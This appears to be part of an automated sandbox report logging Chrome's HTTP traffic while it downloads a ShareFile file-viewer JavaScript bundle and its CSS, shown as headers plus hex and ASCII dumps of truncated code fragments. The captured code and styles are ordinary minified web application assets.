                                                                                                                                                                                                                      2024-11-05 19:36:10 UTC949INData Raw: 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 2e 64 65 66 61 75 6c 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 65 2e 64 65 66 61 75 6c 74 2e 46 72 61 67 6d 65 6e 74 2c 6e 75 6c 6c 2c 28 30 2c 53 65 2e 74 29 28 72 29 29 7d 29 29 7d 3b 76 61 72 20 50 65 3d 5b 22 70 69 6c 65 74 2d 74 65 73 74 73 2e 73 68 61 72 65 66 69 6c 65 74 65 73 74 2e 63 6f 6d 22 2c 22 70 69 6c 65 74 2d 74 65 73 74 73 2e 73 68 61 72 65 66 69 6c 65 73 74 61 67 69 6e 67 2e 63 6f 6d 22 2c 22 70 69 6c 65 74 2d 74 65 73 74 73 2e 73 68 61 72 65 66 69 6c 65 2e 63 6f 6d 22 5d 3b 66 75 6e 63 74 69 6f 6e 20 4c 65 28 72 29 7b 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 72 65 67 69 73 74 65 72 45 78 74 65 6e 73 69 6f 6e 28 74 2e 48 2e 63 72 65 61 74 65 41 63 74 69 76 69 74 79 52 65 70 6f 72 74 42
                                                                                                                                                                                                                      Data Ascii: ion(){return e.default.createElement(e.default.Fragment,null,(0,Se.t)(r))}))};var Pe=["pilet-tests.sharefiletest.com","pilet-tests.sharefilestaging.com","pilet-tests.sharefile.com"];function Le(r){!function(e){e.registerExtension(t.H.createActivityReportB


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      52192.168.2.174977113.224.189.1154437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:10 UTC422OUTGET /sharefile-web/sharefiledev-fileviewer-pilet/1.32.0/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                      Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:10 UTC522INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Content-Type: application/x-javascript
                                                                                                                                                                                                                      Content-Length: 871937
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Last-Modified: Wed, 23 Oct 2024 00:26:16 GMT
                                                                                                                                                                                                                      x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Server: AmazonS3
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 19:36:10 GMT
                                                                                                                                                                                                                      ETag: "6d9484a85b5ff2d8a7fc7c926c5aa72c"
                                                                                                                                                                                                                      X-Cache: Hit from cloudfront
                                                                                                                                                                                                                      Via: 1.1 2ec3090d74e200e4acdb2780da3c3c44.cloudfront.net (CloudFront)
                                                                                                                                                                                                                      X-Amz-Cf-Pop: FRA2-C1
                                                                                                                                                                                                                      X-Amz-Cf-Id: t_vle0U4fUZ1u15uwMhxxVmcuu7MIQ00_2WyA4Xz9AfS0QtvSnwhLA==
                                                                                                                                                                                                                      Age: 2
                                                                                                                                                                                                                      Vary: Origin
                                                                                                                                                                                                                      2024-11-05 19:36:10 UTC16384INData Raw: 2f 2f 40 70 69 6c 65 74 20 76 3a 32 28 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 66 69 6c 65 76 69 65 77 65 72 70 69 6c 65 74 2c 7b 7d 29 0a 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 40 73 68 61 72 65 66 69 6c 65 64 65 76 2f 61 6e 74 64 2d 63 6f 6e 66 69 67 22 2c 22 61 6e 74 64 22 2c 22 72 65 61 63 74 22 2c 22 74 73 6c 69 62 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 76 61 72 20 6e 3d 7b 7d 2c 69 3d 7b 7d 2c 72 3d 7b 7d 2c 73 3d 7b 7d 3b 72 65 74 75 72 6e 7b 73 65 74 74 65 72 73 3a 5b 66 75 6e 63 74 69 6f 6e 28 74 29 7b 6e 2e 63 6f 6c 6f 72 50 61 6c 65 74 74 65 3d 74 2e 63 6f 6c 6f 72 50 61 6c 65 74 74 65 2c 6e 2e 64 65 66 61 75 6c 74 41 6e 74 44 43 6f 6e 66 69 67 3d 74 2e 64 65 66 61 75 6c 74
                                                                                                                                                                                                                      Data Ascii: //@pilet v:2(webpackChunkpr_sharefiledevfileviewerpilet,{})System.register(["@sharefiledev/antd-config","antd","react","tslib"],(function(t,e){var n={},i={},r={},s={};return{setters:[function(t){n.colorPalette=t.colorPalette,n.defaultAntDConfig=t.default
                                                                                                                                                                                                                      2024-11-05 19:36:10 UTC16384INData Raw: 74 72 69 62 75 74 65 28 79 74 29 29 29 72 65 74 75 72 6e 21 31 3b 76 61 72 20 65 3d 4e 75 6d 62 65 72 28 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 77 74 29 7c 7c 30 29 3b 72 65 74 75 72 6e 20 73 3e 3d 65 7d 29 29 3b 69 66 28 75 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 20 63 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 6c 2c 75 5b 75 2e 6c 65 6e 67 74 68 2d 31 5d 2e 6e 65 78 74 53 69 62 6c 69 6e 67 29 2c 6c 7d 63 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 6c 2c 68 29 7d 65 6c 73 65 20 63 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 6c 29 3b 72 65 74 75 72 6e 20 6c 7d 66 75 6e 63 74 69 6f 6e 20 6b 74 28 74 29 7b 76 61 72 20 65 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 31 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3f 61 72 67
                                                                                                                                                                                                                      Data Ascii: tribute(yt)))return!1;var e=Number(t.getAttribute(wt)||0);return s>=e}));if(u.length)return c.insertBefore(l,u[u.length-1].nextSibling),l}c.insertBefore(l,h)}else c.appendChild(l);return l}function kt(t){var e=arguments.length>1&&void 0!==arguments[1]?arg
                                                                                                                                                                                                                      2024-11-05 19:36:10 UTC16384INData Raw: 37 43 32 2e 37 34 37 20 32 20 32 20 32 2e 37 34 36 20 32 20 33 2e 36 36 37 76 31 36 2e 36 36 36 43 32 20 32 31 2e 32 35 33 20 32 2e 37 34 36 20 32 32 20 33 2e 36 36 37 20 32 32 68 31 36 2e 36 36 36 63 2e 39 32 20 30 20 31 2e 36 36 37 2d 2e 37 34 36 20 31 2e 36 36 37 2d 31 2e 36 36 37 56 33 2e 36 36 37 43 32 32 20 32 2e 37 34 37 20 32 31 2e 32 35 34 20 32 20 32 30 2e 33 33 33 20 32 22 7d 29 2c 72 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 70 61 74 68 22 2c 7b 66 69 6c 6c 3a 22 23 66 66 66 22 2c 64 3a 22 4d 31 37 2e 38 33 34 20 37 48 36 2e 31 36 37 61 2e 38 33 33 2e 38 33 33 20 30 20 30 20 30 2d 2e 38 33 33 2e 38 33 33 76 38 2e 33 33 34 63 30 20 2e 34 36 2e 33 37 33 2e 38 33 33 2e 38 33 33 2e 38 33 33 68 31 31 2e 36 36 37 63 2e 34 36 20 30 20 2e 38 33
                                                                                                                                                                                                                      Data Ascii: 7C2.747 2 2 2.746 2 3.667v16.666C2 21.253 2.746 22 3.667 22h16.666c.92 0 1.667-.746 1.667-1.667V3.667C22 2.747 21.254 2 20.333 2"}),r.createElement("path",{fill:"#fff",d:"M17.834 7H6.167a.833.833 0 0 0-.833.833v8.334c0 .46.373.833.833.833h11.667c.46 0 .83
                                                                                                                                                                                                                      2024-11-05 19:36:10 UTC16331INData Raw: 76 2d 31 2e 39 36 35 48 37 2e 35 39 63 31 2e 31 35 35 20 30 20 31 2e 39 32 34 2d 2e 36 33 20 31 2e 39 32 34 2d 31 2e 37 30 36 20 30 2d 31 2e 31 33 36 2d 2e 38 37 34 2d 31 2e 37 35 31 2d 32 2e 30 34 34 2d 31 2e 37 35 31 48 35 2e 35 34 36 56 31 34 2e 35 7a 6d 31 2e 30 39 35 2d 32 2e 36 39 36 48 36 2e 34 36 35 56 39 2e 37 39 38 68 31 2e 30 37 36 63 2e 36 33 34 20 30 20 31 2e 31 30 37 2e 33 35 36 20 31 2e 31 30 37 2e 39 37 38 20 30 20 2e 36 31 32 2d 2e 34 34 37 20 31 2e 30 32 38 2d 31 2e 30 38 20 31 2e 30 32 38 4d 31 31 2e 33 31 20 31 34 2e 35 76 2d 31 2e 39 36 35 68 31 2e 31 31 38 63 31 2e 31 35 35 20 30 20 31 2e 39 32 33 2d 2e 36 33 20 31 2e 39 32 33 2d 31 2e 37 30 36 20 30 2d 31 2e 31 33 36 2d 2e 38 37 33 2d 31 2e 37 35 31 2d 32 2e 30 34 33 2d 31 2e 37 35
                                                                                                                                                                                                                      Data Ascii: v-1.965H7.59c1.155 0 1.924-.63 1.924-1.706 0-1.136-.874-1.751-2.044-1.751H5.546V14.5zm1.095-2.696H6.465V9.798h1.076c.634 0 1.107.356 1.107.978 0 .612-.447 1.028-1.08 1.028M11.31 14.5v-1.965h1.118c1.155 0 1.923-.63 1.923-1.706 0-1.136-.873-1.751-2.043-1.75
                                                                                                                                                                                                                      2024-11-05 19:36:10 UTC16384INData Raw: 61 73 65 22 77 6f 72 64 22 3a 72 65 74 75 72 6e 20 72 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 50 6e 2c 7b 73 69 7a 65 3a 6e 2c 63 6f 6c 6f 72 3a 69 7d 29 3b 63 61 73 65 22 65 6e 63 61 70 73 75 6c 61 74 65 64 50 6f 73 74 53 63 72 69 70 74 22 3a 72 65 74 75 72 6e 20 72 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 6b 65 2c 7b 73 69 7a 65 3a 6e 2c 63 6f 6c 6f 72 3a 69 7d 29 3b 63 61 73 65 22 66 6c 61 73 68 22 3a 72 65 74 75 72 6e 20 72 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 4c 65 2c 7b 73 69 7a 65 3a 6e 2c 63 6f 6c 6f 72 3a 69 7d 29 3b 63 61 73 65 22 69 6e 64 65 73 69 67 6e 22 3a 72 65 74 75 72 6e 20 72 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 7a 65 2c 7b 73 69 7a 65 3a 6e 2c 63 6f 6c 6f 72 3a 69 7d 29 3b 63 61 73 65 22 61 75 64 69 6f 22 3a 72
                                                                                                                                                                                                                      Data Ascii: ase"word":return r.createElement(Pn,{size:n,color:i});case"encapsulatedPostScript":return r.createElement(ke,{size:n,color:i});case"flash":return r.createElement(Le,{size:n,color:i});case"indesign":return r.createElement(ze,{size:n,color:i});case"audio":r
                                                                                                                                                                                                                      2024-11-05 19:36:10 UTC16384INData Raw: 7d 2c 63 69 3d 7b 64 69 73 70 6c 61 79 3a 22 66 6c 65 78 22 2c 6a 75 73 74 69 66 79 43 6f 6e 74 65 6e 74 3a 22 63 65 6e 74 65 72 22 2c 68 65 69 67 68 74 3a 22 38 30 25 22 2c 77 69 64 74 68 3a 22 38 30 25 22 2c 61 73 70 65 63 74 52 61 74 69 6f 3a 22 31 36 2f 39 22 7d 2c 68 69 3d 7b 7d 3b 63 6f 6e 73 74 20 75 69 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 2e 66 69 6c 65 4e 61 6d 65 2c 6e 3d 74 2e 6d 65 64 69 61 55 72 6c 2c 69 3d 74 2e 6f 6e 45 72 72 6f 72 2c 73 3d 28 30 2c 72 2e 75 73 65 52 65 66 29 28 6e 75 6c 6c 29 2c 61 3d 64 69 28 65 29 3b 72 65 74 75 72 6e 28 30 2c 72 2e 75 73 65 45 66 66 65 63 74 29 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 73 2e 63 75 72 72 65 6e 74 3b 72 65 74 75 72 6e 20 74 26 26 28 74 2e 6f 6e 65 72
                                                                                                                                                                                                                      Data Ascii: },ci={display:"flex",justifyContent:"center",height:"80%",width:"80%",aspectRatio:"16/9"},hi={};const ui=function(t){var e=t.fileName,n=t.mediaUrl,i=t.onError,s=(0,r.useRef)(null),a=di(e);return(0,r.useEffect)((function(){var t=s.current;return t&&(t.oner
                                                                                                                                                                                                                      2024-11-05 19:36:10 UTC16384INData Raw: 69 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 3b 72 65 74 75 72 6e 20 6b 69 28 74 68 69 73 2c 6e 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 5a 69 28 74 2c 65 29 7b 76 61 72 20 6e 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 32 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 32 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 32 5d 3a 22 2e 22 3b 69 66 28 74 29 7b 69 66 28 74 5b 65 5d 29 72 65 74 75 72 6e 20 74 5b 65 5d 3b 66 6f 72 28 76 61 72 20 69 3d 65 2e 73 70 6c 69 74 28 6e 29 2c 72 3d 74 2c 73 3d 30 3b 73 3c 69 2e 6c 65 6e 67 74 68 3b 2b 2b 73 29 7b 69 66 28 21 72 29 72 65 74 75 72 6e 3b 69 66 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 72 5b 69 5b 73 5d 5d 26 26 73 2b 31 3c 69 2e 6c 65 6e 67 74 68 29 72 65 74 75
                                                                                                                                                                                                                      Data Ascii: i.apply(this,arguments);return ki(this,n)}}function Zi(t,e){var n=arguments.length>2&&void 0!==arguments[2]?arguments[2]:".";if(t){if(t[e])return t[e];for(var i=e.split(n),r=t,s=0;s<i.length;++s){if(!r)return;if("string"==typeof r[i[s]]&&s+1<i.length)retu
                                                                                                                                                                                                                      2024-11-05 19:36:10 UTC16384INData Raw: 4f 66 28 22 2d 22 29 3e 2d 31 3f 28 22 6c 61 6e 67 75 61 67 65 4f 6e 6c 79 22 21 3d 3d 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 6c 6f 61 64 26 26 73 28 74 68 69 73 2e 66 6f 72 6d 61 74 4c 61 6e 67 75 61 67 65 43 6f 64 65 28 74 29 29 2c 22 6c 61 6e 67 75 61 67 65 4f 6e 6c 79 22 21 3d 3d 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 6c 6f 61 64 26 26 22 63 75 72 72 65 6e 74 4f 6e 6c 79 22 21 3d 3d 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 6c 6f 61 64 26 26 73 28 74 68 69 73 2e 67 65 74 53 63 72 69 70 74 50 61 72 74 46 72 6f 6d 43 6f 64 65 28 74 29 29 2c 22 63 75 72 72 65 6e 74 4f 6e 6c 79 22 21 3d 3d 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 6c 6f 61 64 26 26 73 28 74 68 69 73 2e 67 65 74 4c 61 6e 67 75 61 67 65 50 61 72 74 46 72 6f 6d 43 6f 64 65 28 74 29 29 29 3a 22 73
                                                                                                                                                                                                                      Data Ascii: Of("-")>-1?("languageOnly"!==this.options.load&&s(this.formatLanguageCode(t)),"languageOnly"!==this.options.load&&"currentOnly"!==this.options.load&&s(this.getScriptPartFromCode(t)),"currentOnly"!==this.options.load&&s(this.getLanguagePartFromCode(t))):"s
                                                                                                                                                                                                                      2024-11-05 19:36:10 UTC2997INData Raw: 6c 7c 7c 68 5b 75 5d 2e 70 75 73 68 28 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 76 6f 69 64 20 30 21 3d 3d 74 2e 70 65 6e 64 69 6e 67 5b 65 5d 26 26 28 64 65 6c 65 74 65 20 74 2e 70 65 6e 64 69 6e 67 5b 65 5d 2c 74 2e 70 65 6e 64 69 6e 67 43 6f 75 6e 74 2d 2d 29 7d 28 6e 2c 74 29 2c 65 26 26 6e 2e 65 72 72 6f 72 73 2e 70 75 73 68 28 65 29 2c 30 21 3d 3d 6e 2e 70 65 6e 64 69 6e 67 43 6f 75 6e 74 7c 7c 6e 2e 64 6f 6e 65 7c 7c 28 4f 62 6a 65 63 74 2e 6b 65 79 73 28 6e 2e 6c 6f 61 64 65 64 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 61 5b 74 5d 7c 7c 28 61 5b 74 5d 3d 7b 7d 29 3b 76 61 72 20 65 3d 6e 2e 6c 6f 61 64 65 64 5b 74 5d 3b 65 2e 6c 65 6e 67 74 68 26 26 65 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 65
                                                                                                                                                                                                                      Data Ascii: l||h[u].push(o),function(t,e){void 0!==t.pending[e]&&(delete t.pending[e],t.pendingCount--)}(n,t),e&&n.errors.push(e),0!==n.pendingCount||n.done||(Object.keys(n.loaded).forEach((function(t){a[t]||(a[t]={});var e=n.loaded[t];e.length&&e.forEach((function(e
                                                                                                                                                                                                                      2024-11-05 19:36:10 UTC16384INData Raw: 61 6c 6c 62 61 63 6b 4e 53 5d 29 2c 74 2e 73 75 70 70 6f 72 74 65 64 4c 6e 67 73 26 26 74 2e 73 75 70 70 6f 72 74 65 64 4c 6e 67 73 2e 69 6e 64 65 78 4f 66 28 22 63 69 6d 6f 64 65 22 29 3c 30 26 26 28 74 2e 73 75 70 70 6f 72 74 65 64 4c 6e 67 73 3d 74 2e 73 75 70 70 6f 72 74 65 64 4c 6e 67 73 2e 63 6f 6e 63 61 74 28 5b 22 63 69 6d 6f 64 65 22 5d 29 29 2c 74 7d 66 75 6e 63 74 69 6f 6e 20 53 72 28 74 2c 65 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 74 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 69 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 74 29 3b 65 26 26 28 69 3d 69 2e 66 69 6c 74 65 72 28 28 66 75 6e 63 74 69 6f 6e 28
                                                                                                                                                                                                                      Data Ascii: allbackNS]),t.supportedLngs&&t.supportedLngs.indexOf("cimode")<0&&(t.supportedLngs=t.supportedLngs.concat(["cimode"])),t}function Sr(t,e){var n=Object.keys(t);if(Object.getOwnPropertySymbols){var i=Object.getOwnPropertySymbols(t);e&&(i=i.filter((function(


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      53192.168.2.174977313.227.219.304437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:10 UTC576OUTGET /sharefile-web/sharefiledev-fileviewer-pilet/1.32.0/package/dist/main.css HTTP/1.1
                                                                                                                                                                                                                      Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                      Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: style
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:10 UTC510INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Content-Type: text/css
                                                                                                                                                                                                                      Content-Length: 80657
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 07:23:14 GMT
                                                                                                                                                                                                                      Last-Modified: Wed, 23 Oct 2024 00:26:16 GMT
                                                                                                                                                                                                                      ETag: "3efbae3e8929430a8d33717801e9c89c"
                                                                                                                                                                                                                      x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Server: AmazonS3
                                                                                                                                                                                                                      X-Cache: Hit from cloudfront
                                                                                                                                                                                                                      Via: 1.1 0f34c0d3b0e50b8875bcbb7d41684a58.cloudfront.net (CloudFront)
                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS54-C1
                                                                                                                                                                                                                      X-Amz-Cf-Id: _TOFvgLDv1hglvzalLlspakLnDn0dWvQst3RhQslOpe1mI7VRetruA==
                                                                                                                                                                                                                      Age: 43977
                                                                                                                                                                                                                      Vary: Origin
                                                                                                                                                                                                                      2024-11-05 19:36:10 UTC16384INData Raw: 2e 64 69 61 6c 6f 67 7b 2d 2d 64 69 61 6c 6f 67 2d 62 67 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 2d 2d 64 69 61 6c 6f 67 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 2d 2d 64 69 61 6c 6f 67 2d 73 68 61 64 6f 77 3a 30 20 32 70 78 20 31 34 70 78 20 30 20 72 67 62 61 28 35 38 2c 35 37 2c 36 38 2c 2e 32 29 3b 2d 2d 74 65 78 74 2d 70 72 69 6d 61 72 79 2d 63 6f 6c 6f 72 3a 23 31 35 31 34 31 61 3b 2d 2d 74 65 78 74 2d 73 65 63 6f 6e 64 61 72 79 2d 63 6f 6c 6f 72 3a 23 35 62 35 62 36 36 3b 2d 2d 68 6f 76 65 72 2d 66 69 6c 74 65 72 3a 62 72 69 67 68 74 6e 65 73 73 28 30 2e 39 29 3b 2d 2d 66 6f 63 75 73 2d 72 69 6e 67 2d 63 6f 6c 6f 72 3a 23 30 30 36 30 64 66 3b 2d 2d 66 6f 63 75 73 2d 72 69 6e 67 2d 6f 75 74 6c 69 6e 65 3a 32 70 78 20 73 6f 6c 69 64 20 76
                                                                                                                                                                                                                      Data Ascii: .dialog{--dialog-bg-color:#fff;--dialog-border-color:#fff;--dialog-shadow:0 2px 14px 0 rgba(58,57,68,.2);--text-primary-color:#15141a;--text-secondary-color:#5b5b66;--hover-filter:brightness(0.9);--focus-ring-color:#0060df;--focus-ring-outline:2px solid v
                                                                                                                                                                                                                      2024-11-05 19:36:10 UTC1514INData Raw: 69 6f 6e 2d 75 6e 66 6f 63 75 73 65 64 2d 66 69 65 6c 64 2d 62 61 63 6b 67 72 6f 75 6e 64 29 3b 62 6f 72 64 65 72 3a 32 70 78 20 73 6f 6c 69 64 20 76 61 72 28 2d 2d 69 6e 70 75 74 2d 75 6e 66 6f 63 75 73 65 64 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 29 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 66 6f 6e 74 3a 63 61 6c 63 28 39 70 78 2a 76 61 72 28 2d 2d 73 63 61 6c 65 2d 66 61 63 74 6f 72 29 29 20 73 61 6e 73 2d 73 65 72 69 66 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 6d 61 72 67 69 6e 3a 30 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 74 6f 70 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 61 6e 6e 6f 74 61 74 69 6f 6e 4c 61 79 65 72 20 2e 62 75 74 74 6f 6e 57 69 64 67 65 74 41 6e 6e 6f 74 61 74 69 6f 6e 3a 69 73 28 2e 63 68 65 63 6b 42
                                                                                                                                                                                                                      Data Ascii: ion-unfocused-field-background);border:2px solid var(--input-unfocused-border-color);box-sizing:border-box;font:calc(9px*var(--scale-factor)) sans-serif;height:100%;margin:0;vertical-align:top;width:100%}.annotationLayer .buttonWidgetAnnotation:is(.checkB
                                                                                                                                                                                                                      2024-11-05 19:36:10 UTC16384INData Raw: 6f 6e 65 3b 62 6f 72 64 65 72 3a 32 70 78 20 73 6f 6c 69 64 20 76 61 72 28 2d 2d 69 6e 70 75 74 2d 66 6f 63 75 73 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 29 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 32 70 78 3b 6f 75 74 6c 69 6e 65 3a 76 61 72 28 2d 2d 69 6e 70 75 74 2d 66 6f 63 75 73 2d 6f 75 74 6c 69 6e 65 29 7d 2e 61 6e 6e 6f 74 61 74 69 6f 6e 4c 61 79 65 72 20 2e 62 75 74 74 6f 6e 57 69 64 67 65 74 41 6e 6e 6f 74 61 74 69 6f 6e 3a 69 73 28 2e 63 68 65 63 6b 42 6f 78 2c 2e 72 61 64 69 6f 42 75 74 74 6f 6e 29 20 3a 66 6f 63 75 73 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 6e 6f 6e 65 7d 2e 61 6e 6e 6f 74 61 74 69 6f 6e 4c 61 79 65 72 20 2e 62 75 74 74 6f
                                                                                                                                                                                                                      Data Ascii: one;border:2px solid var(--input-focus-border-color);border-radius:2px;outline:var(--input-focus-outline)}.annotationLayer .buttonWidgetAnnotation:is(.checkBox,.radioButton) :focus{background-color:transparent;background-image:none}.annotationLayer .butto
                                                                                                                                                                                                                      2024-11-05 19:36:10 UTC16384INData Raw: 79 65 72 2e 68 69 67 68 6c 69 67 68 74 69 6e 67 2e 66 72 65 65 20 73 70 61 6e 7b 63 75 72 73 6f 72 3a 76 61 72 28 2d 2d 65 64 69 74 6f 72 46 72 65 65 48 69 67 68 6c 69 67 68 74 2d 65 64 69 74 69 6e 67 2d 63 75 72 73 6f 72 29 7d 23 76 69 65 77 65 72 43 6f 6e 74 61 69 6e 65 72 2e 70 64 66 50 72 65 73 65 6e 74 61 74 69 6f 6e 4d 6f 64 65 3a 66 75 6c 6c 73 63 72 65 65 6e 20 2e 6e 6f 41 6c 74 54 65 78 74 42 61 64 67 65 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 2e 31 64 70 70 78 29 7b 3a 72 6f 6f 74 7b 2d 2d 65 64 69 74 6f 72 46 72 65 65 54 65 78 74 2d 65 64 69 74 69 6e 67 2d 63 75 72 73 6f 72 3a 75 72 6c 28 39 66 62 30 33 32 61 31 37 39 39 63 61 32 61 31 63 37
                                                                                                                                                                                                                      Data Ascii: yer.highlighting.free span{cursor:var(--editorFreeHighlight-editing-cursor)}#viewerContainer.pdfPresentationMode:fullscreen .noAltTextBadge{display:none!important}@media (min-resolution:1.1dppx){:root{--editorFreeText-editing-cursor:url(9fb032a1799ca2a1c7
                                                                                                                                                                                                                      2024-11-05 19:36:10 UTC12288INData Raw: 73 69 7a 65 72 2d 73 69 7a 65 29 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 77 69 64 74 68 3a 76 61 72 28 2d 2d 72 65 73 69 7a 65 72 2d 73 69 7a 65 29 7d 2e 74 6f 70 4c 65 66 74 3a 69 73 28 3a 69 73 28 3a 69 73 28 2e 61 6e 6e 6f 74 61 74 69 6f 6e 45 64 69 74 6f 72 4c 61 79 65 72 20 3a 69 73 28 2e 66 72 65 65 54 65 78 74 45 64 69 74 6f 72 2c 2e 69 6e 6b 45 64 69 74 6f 72 2c 2e 73 74 61 6d 70 45 64 69 74 6f 72 29 29 3e 2e 72 65 73 69 7a 65 72 73 29 3e 2e 72 65 73 69 7a 65 72 29 7b 6c 65 66 74 3a 76 61 72 28 2d 2d 72 65 73 69 7a 65 72 2d 73 68 69 66 74 29 3b 74 6f 70 3a 76 61 72 28 2d 2d 72 65 73 69 7a 65 72 2d 73 68 69 66 74 29 7d 2e 74 6f 70 4d 69 64 64 6c 65 3a 69 73 28 3a 69 73 28 3a 69 73 28 2e 61 6e 6e 6f 74 61 74 69 6f 6e 45 64 69 74 6f
                                                                                                                                                                                                                      Data Ascii: sizer-size);position:absolute;width:var(--resizer-size)}.topLeft:is(:is(:is(.annotationEditorLayer :is(.freeTextEditor,.inkEditor,.stampEditor))>.resizers)>.resizer){left:var(--resizer-shift);top:var(--resizer-shift)}.topMiddle:is(:is(:is(.annotationEdito
